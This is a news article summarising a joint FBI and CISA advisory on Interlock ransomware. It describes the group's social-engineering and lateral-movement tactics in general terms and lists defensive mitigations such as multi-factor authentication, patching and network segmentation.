Innovation and Technology
New FBI Warning — Windows And Linux Users Must Apply 2FA Now
Introduction to the Interlock Ransomware Threat
There are some weeks that I almost feel like I have joined the Federal Bureau of Investigation, given the number of alerts that I am exposed to. Within just the last few days, I have shared a warning to 10 million Android users to disconnect their devices, another for all smartphone users as phantom hacker attacks continue, and now comes the FBI recommendation for Windows and Linux users to urgently enable two-factor authentication to complete the cyber-trilogy. Here’s everything you need to know when it comes to mitigating the Interlock ransomware threat.
FBI and CISA Issue Joint Interlock Ransomware Warning
A relatively new ransomware threat is, according to the Cybersecurity and Infrastructure Security Agency, on the rise and targeting both businesses and critical infrastructure providers with double-extortion attacks. A July 22 joint cybersecurity advisory, issued alongside the FBI under alert code aa25-203a, was prompted by ongoing FBI investigations that have identified both indicators of compromise and the tactics, techniques and procedures used by the attackers. “The FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems,” the alert confirmed.
Although I would heartily recommend reading the full alert for all the technical details, the attacks can be summed up as employing drive-by-downloads and ClickFix social engineering to gain initial access. Once the system has been breached, the attackers then deployed credential stealers and keyloggers to obtain account credentials and execute the necessary lateral movement and privilege escalation required to deploy the ransomware and exfiltrate data.
Cybersecurity Experts Throw Their Weight Behind the Latest FBI Ransomware Warning
It’s not just the FBI and CISA that have raised the red flag as far as the Interlock ransomware threat is concerned; the cybersecurity industry has also made it clear how dangerous this particular campaign actually is.
"Interlock initially leveraged ClickFix as their primary method of gaining access, but recent reports suggest a transition towards the use of FileFix,” Steven Thomson, a senior security operations center analyst at Barrier Networks explained, adding that both tools have been observed being used to download and deploy a remote access trojan, which is then moved laterally to key devices in order to establish a foothold within the target environment.” Using “throwaway IP addresses” to communicate, the RAT also, according to a Barrier Networks investigation, uses “PowerShell commands to conduct reconnaissance within the victim’s network.” Exfiltrated data is moved into an Azure blob storage container, Thomson said, enabling the attackers to evade detection “by blending in with normal cloud activity.”
Erich Kron, a security awareness advocate at KnowBe4, meanwhile, told me that the use of compromised websites for drive-by malware downloads is “not very common in the world of ransomware,” but that Interlock is working hard to make a name for themselves so some tactics, such as using social engineering, are most certainly common. “Convincing people to install updates or fixes, really just disguised malware, in ClickFix attacks is not a new concept as fake updates or antivirus notifications have been around for years“ Kron pointed out, and to counter those organizations should “ensure their employees are aware of the campaigns and are taught to spot them, and that they are aware of the real and legitimate process the organization’s IT department uses to install patches or updates so they are not tricked into executing malware.”
Mitigating the Interlock Ransomware Threat — The FBI Recommendations
Prevention is always better than cure, and that is no truer than when applied to the world of cybersecurity. Mitigating a threat is the priority for every security team, nobody wants to be dealing with the fallout of failings to do. The FBI is aware of this, which is why the cybersecurity alert features a large, red bullet point mitigation table at the top of the advisory. It’s also why it’s the focus of this article.
While the “actions for organizations to take today” list is, of course, extremely valuable, it is not the complete litigation picture. For that you need to dig deeper into the alert itself. Personally, I would move number four up to number one as well – especially the employing 2FA across accounts advice, as this is crucial in preventing the lateral movement and privilege escalation that enables a successful ransomware attack.
But anyhoo, let’s explore the full FBI mitigation advice in our own bullet point list, shall we?
- Require multi-factor authentication, or 2FA as many still refer to it, across all services and accounts where possible, but particularly “webmail, virtual private networks, and accounts that access critical systems.”
- Employ web access firewalls to prevent process injection from malicious domains, along with domain name system filtering to block access in the first place.
- Ensure all accounts comply with NIST password standards.
- Keep all operating systems, firmware and software up to date through a managed and prioritized patching system.
- Employ network segmentation to prevent lateral movement by adversaries.
- Review domain controllers, servers, workstations, and active directories for new or unrecognized accounts.
- Disable unused ports.
- Disabling utilities that run from the command line so as to make it harder for adversaries to escalate privileges and move laterally through the network.
And, as the FBI notes, implement a recovery plan!
Conclusion
The Interlock ransomware threat is a serious concern for Windows and Linux users, and it’s essential to take immediate action to mitigate the risk. By following the FBI’s recommendations, including enabling 2FA, employing web access firewalls, and keeping software up to date, organizations can significantly reduce the risk of a successful attack. It’s crucial to stay vigilant and proactive in the face of emerging threats like Interlock, and to prioritize cybersecurity awareness and education to prevent these types of attacks.
FAQs
Q: What is the Interlock ransomware threat?
A: The Interlock ransomware threat is a relatively new ransomware campaign that targets both businesses and critical infrastructure providers with double-extortion attacks.
Q: How does the Interlock ransomware threat work?
A: The Interlock ransomware threat employs drive-by-downloads and ClickFix social engineering to gain initial access, and then deploys credential stealers and keyloggers to obtain account credentials and execute lateral movement and privilege escalation.
Q: What can organizations do to mitigate the Interlock ransomware threat?
A: Organizations can mitigate the Interlock ransomware threat by enabling 2FA, employing web access firewalls, keeping software up to date, and implementing a recovery plan, among other measures.
Q: Why is it essential to enable 2FA?
A: Enabling 2FA is crucial in preventing lateral movement and privilege escalation, which enables a successful ransomware attack.
Q: What is the role of cybersecurity awareness and education in preventing Interlock ransomware attacks?
A: Cybersecurity awareness and education play a critical role in preventing Interlock ransomware attacks by teaching employees to spot and report suspicious activity, and to follow best practices for cybersecurity.
Community Mentorship Programs Help Strengthen Local Workforce and Social Impact
Low-Code Platforms are Changing How Businesses Build Internal Technology
Microlearning in Employee Training: A Practical Approach to Workplace Skill Development
Decision-Making Frameworks Improve Strategic Leadership and Organizational Clarity
Career Ladder Programs Strengthen Workforce Development and Employee Retention
Workplace Recognition Programs Improve Organizational Culture and Employee Engagement
Why Mental Endurance is Essential for Workplace Resilience
What Informational Interviews are and Why they Matter
How Emotional Intelligence Can Help You Manage Stress and Build Resilience
Interview with Dr. Kristy K. Taylor, WORxK Global News Magazine Founder
Sarah Herrlinger Talks AirPods Pro Hearing Aid
NetWork Your Way to Success: Top Tips for Maximizing Your Professional Network
Unlocking Human Potential: Kim Groshek’s Journey to Transforming Leadership and Stress Resilience
The Power of Belonging: Why Feeling Accepted Matters in the Workplace
Health-care stocks fall after Warren PBM bill, Brian Thompson shooting
Glenda Benevides: Creating Global Impact Through Music
-
Resiliency7 months agoHow Emotional Intelligence Can Help You Manage Stress and Build Resilience
-
Career Advice1 year agoInterview with Dr. Kristy K. Taylor, WORxK Global News Magazine Founder
-
Diversity and Inclusion (DEIA)1 year agoSarah Herrlinger Talks AirPods Pro Hearing Aid
-
Career Advice1 year agoNetWork Your Way to Success: Top Tips for Maximizing Your Professional Network
-
Changemaker Interviews1 year agoUnlocking Human Potential: Kim Groshek’s Journey to Transforming Leadership and Stress Resilience
-
Diversity and Inclusion (DEIA)1 year agoThe Power of Belonging: Why Feeling Accepted Matters in the Workplace
-
Global Trends and Politics1 year agoHealth-care stocks fall after Warren PBM bill, Brian Thompson shooting
-
Changemaker Interviews12 months agoGlenda Benevides: Creating Global Impact Through Music